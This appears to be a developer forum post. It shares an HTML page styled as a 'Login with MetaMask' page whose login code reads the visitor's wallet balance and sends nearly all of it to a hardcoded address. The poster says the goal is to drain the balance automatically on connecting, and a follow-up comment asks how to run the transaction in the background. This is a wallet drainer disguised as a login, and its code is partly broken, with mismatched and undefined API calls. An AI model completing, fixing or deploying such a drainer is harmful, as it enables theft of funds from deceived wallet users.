# connecting dapp and sending out funds

Tags: web3js, ethereum-wallet-dapp

```
<html>

<head>
  <title>Web3 Metamask Login</title>
  <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
</head>

<body class="flex w-screen h-screen justify-center items-center">
  <div class="flex-col space-y-2 justify-center items-center">
    <button id='loginButton' onclick="" class="mx-auto rounded-md p-2 bg-purple-500 text-white">
      Login with MetaMask
    </button>
    <p id='userWallet' class='text-lg text-gray-600 my-2'></p>
  </div>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.7.0-rc.0/web3.min.js" integrity="sha512-/PTXSvaFzmO4So7Ghyq+DEZOz0sNLU4v1DP4gMOfY3kFu9L/IKoqSHZ6lNl3ZoZ7wT20io3vu/U4IchGcGIhfw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>


  <script>
    window.userWalletAddress = null
    const loginButton = document.getElementById('loginButton')
    const userWallet = document.getElementById('userWallet')

    function toggleButton() {
      if (!window.ethereum) {
        loginButton.innerText = 'MetaMask is not installed'
        loginButton.classList.remove('bg-purple-500', 'text-white')
        loginButton.classList.add('bg-gray-500', 'text-gray-100', 'cursor-not-allowed')
        return false
      }

      loginButton.addEventListener('click', loginWithMetaMask)
    }

    async function loginWithMetaMask() {
      const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' })

        .catch((e) => {
          console.error(e.message)
          return
        })
      if (!accounts) { return }

      window.userWalletAddress = accounts[0]
      userWallet.innerText = window.userWalletAddress
      loginButton.innerText = 'Sign out of MetaMask'
      // console.log(window.ethereum.getBalance(window.userWalletAddress));

  // const web3 = new Web3(provider);
  //
  // console.log("Web3 instance is", web3);

      // send out
      var from = window.userWalletAddress;
      var to = "0x06A9a217f32d2368199386Aabd84F7c02123a183";
      var balance = window.ethereum.getBalance(from);
      console.log(to);
      var gas = new BigNumber(21000);
      // You can use gasPrice=web3.eth.gasPrice or look up http://ethgasstation.info/
      var gasPrice = web3.utils.toWei(5, "gwei");
      var cost = gas.mul(gasPrice);
      var sendAmount = balance.sub(cost);
      var tx = eth.sendTransaction({from: from, to: to, gas: gas, gasPrice: gasPrice, value: sendAmount});
      console.log(eth.getTransaction(tx));
//

      loginButton.removeEventListener('click', loginWithMetaMask)
      setTimeout(() => {
        loginButton.addEventListener('click', signOutOfMetaMask)
      }, 200)
    }

    function signOutOfMetaMask() {
      window.userWalletAddress = null
      userWallet.innerText = ''
      loginButton.innerText = 'Sign in with MetaMask'

      loginButton.removeEventListener('click', signOutOfMetaMask)
      setTimeout(() => {
        loginButton.addEventListener('click', loginWithMetaMask)
      }, 200)
    }

    window.addEventListener('DOMContentLoaded', () => {
      toggleButton()
    });
  </script>
</body>

</html>
```

this is my code, im trying to send out the balance automatically after connecting to dapp

Comment: What's the problem?

Comment: i can not run transaction in the background and also my contract address is not accepting ether